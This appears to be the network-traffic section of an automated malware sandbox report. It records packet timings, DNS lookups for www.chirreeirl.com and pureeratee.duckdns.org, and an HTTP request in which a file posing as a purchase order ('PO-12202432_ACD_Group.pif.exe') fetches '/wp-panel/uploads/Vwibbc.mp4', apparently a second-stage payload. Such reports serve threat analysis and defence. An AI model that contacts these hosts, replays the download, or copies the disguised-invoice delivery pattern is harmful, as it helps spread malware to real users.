                                                                Jan 9, 2025 19:07:40.208117962 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.208466053 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.208587885 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.208689928 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.209280968 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.209522009 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.209984064 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.210292101 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.210661888 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.210905075 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.210983038 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.211488962 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.211644888 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.211719036 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.212184906 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.212342978 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.212435961 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.212877989 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.213032007 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.213097095 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.213572979 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.213895082 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.214407921 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.214696884 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.215091944 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.215269089 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.215478897 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.215806961 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.216130018 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.216625929 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.216789961 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.216922998 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.217320919 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.217468977 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.217572927 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.218017101 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.218235970 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.218378067 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.218765020 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.219026089 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.229772091 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.229935884 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.230155945 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.230479956 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.230611086 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.230703115 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.231100082 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.231271982 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.231365919 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.231909037 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.232146025 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.232618093 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.232779980 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.232898951 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.233313084 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.233469009 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.233546019 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.234034061 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.234292030 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.234832048 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.235032082 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.235161066 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.235533953 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.235704899 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.235755920 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.274235010 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.274477005 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.274477005 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.274957895 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.275161028 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.275207996 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.275662899 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.275840998 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.275916100 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.276334047 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.276525974 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.276577950 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.328511000 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.328701019 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.328881025 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.329267025 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.329514027 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.329920053 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.330163002 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.330636024 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.330780029 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.330929995 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.331571102 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.331785917 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.331860065 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.332139969 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.332389116 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.332433939 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.332839966 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.333091021 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.333570957 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.333755016 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.333880901 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.334410906 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.334568977 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.334708929 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.335057974 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.335364103 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.335769892 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.335988045 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.461420059 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.461513996 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.462047100 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.462270975 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.462773085 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.463064909 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.463469028 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.463639021 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.463865042 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.494564056 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.494756937 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.494920015 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.495470047 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.495650053 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.495754004 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.496083021 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.496321917 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.496773958 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.496968031 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.497140884 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.497641087 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.497807980 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.497807980 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.498032093 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.587521076 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.587851048 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.587851048 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.588255882 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.588491917 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.588957071 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.589184999 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.589792013 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.590115070 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.590457916 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.590589046 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.590814114 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.591172934 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.591340065 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.591593027 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.592116117 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.592432976 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.592825890 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.593148947 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.593453884 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.593616009 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.593833923 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.594177008 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.594419003 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.594512939 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.595092058 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.595341921 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.595741034 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.596004963 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.596456051 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.596628904 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.596853971 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.597188950 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.597361088 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.597537041 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.597925901 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.598244905 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.598676920 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.598948956 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.599333048 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.599675894 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.600126982 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.600333929 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.600554943 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.600816965 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.601052046 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.601130009 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.601557970 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.601883888 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.602473974 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.602660894 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.602844954 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.603084087 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.603287935 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.603758097 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.603914022 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.604182959 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.604527950 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.604690075 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.604821920 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.605334997 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.605482101 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.605572939 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.605956078 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.606096029 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.606318951 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.606772900 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.607018948 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.607405901 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.607698917 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.608231068 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.608407021 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.608552933 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.608938932 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.609213114 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.609599113 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.609865904 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.610491037 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.610646009 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.610928059 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.611221075 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.611452103 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.611530066 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.611885071 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.612046957 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.612154007 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.612545013 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.612696886 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.612922907 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.613343000 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.613801956 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.613897085 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.614068031 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.614335060 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.614731073 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.614988089 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.615601063 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.615802050 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.615899086 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.616264105 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.616427898 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.616548061 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.616930008 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.617078066 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.617182016 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.617676020 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.617883921 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.617885113 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.618490934 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.618690014 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.618690968 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.619165897 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.619342089 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.619565964 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.619904995 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.620070934 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.620249033 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.634402037 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.634666920 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.634756088 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.635238886 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.635510921 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.635865927 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.636149883 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.636563063 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.636745930 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.637000084 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.637411118 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.637701035 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.637881041 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.638055086 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.638230085 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.638297081 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.638816118 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.639050961 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.639190912 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.639683962 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.639893055 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.640289068 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.640558004 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.641062975 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.641222954 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.641403913 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.641680002 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.641937017 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.642014980 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.728097916 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.728316069 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.728487968 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.728637934 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.728801966 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.728801966 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.729043961 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.729270935 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.729441881 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.729629993 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.730181932 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.730405092 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.730647087 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.730809927 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.731069088 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.731493950 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.731637955 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.731906891 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.732266903 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.732480049 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.732660055 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.733010054 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.733169079 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.733314991 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.733692884 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.733922958 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.734081984 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.734400988 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.734649897 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.735173941 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.735395908 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.735915899 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.736161947 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.736643076 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.736820936 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.736994982 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.737344027 CET44349753209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:08:01.737601995 CET49753443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:08:01.738151073 CET44349753209.58.149.225192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 19:07:38.630899906 CET | 61562 | 53 | 192.168.11.20 | 1.1.1.1
Jan 9, 2025 19:07:38.904886007 CET | 53 | 61562 | 1.1.1.1 | 192.168.11.20
Jan 9, 2025 19:07:56.763575077 CET | 54043 | 53 | 192.168.11.20 | 1.1.1.1
Jan 9, 2025 19:07:56.914554119 CET | 53 | 54043 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 19:07:38.630899906 CET | 192.168.11.20 | 1.1.1.1 | 0xd77b | Standard query (0) | www.chirreeirl.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 19:07:56.763575077 CET | 192.168.11.20 | 1.1.1.1 | 0xe0f4 | Standard query (0) | pureeratee.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 19:07:38.904886007 CET | 1.1.1.1 | 192.168.11.20 | 0xd77b | No error (0) | www.chirreeirl.com | chirreeirl.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 19:07:38.904886007 CET | 1.1.1.1 | 192.168.11.20 | 0xd77b | No error (0) | chirreeirl.com | | 209.58.149.225 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 19:07:56.914554119 CET | 1.1.1.1 | 192.168.11.20 | 0xe0f4 | No error (0) | pureeratee.duckdns.org | | 193.187.91.218 | A (IP address) | IN (0x0001) | false
                                                                • www.chirreeirl.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49751 | 209.58.149.225 | 443 | 4992 | C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 18:07:39 UTC | 220 | OUT | GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: www.chirreeirl.com
Connection: Keep-Alive
2025-01-09 18:07:39 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 18:07:39 GMT
Server: Apache
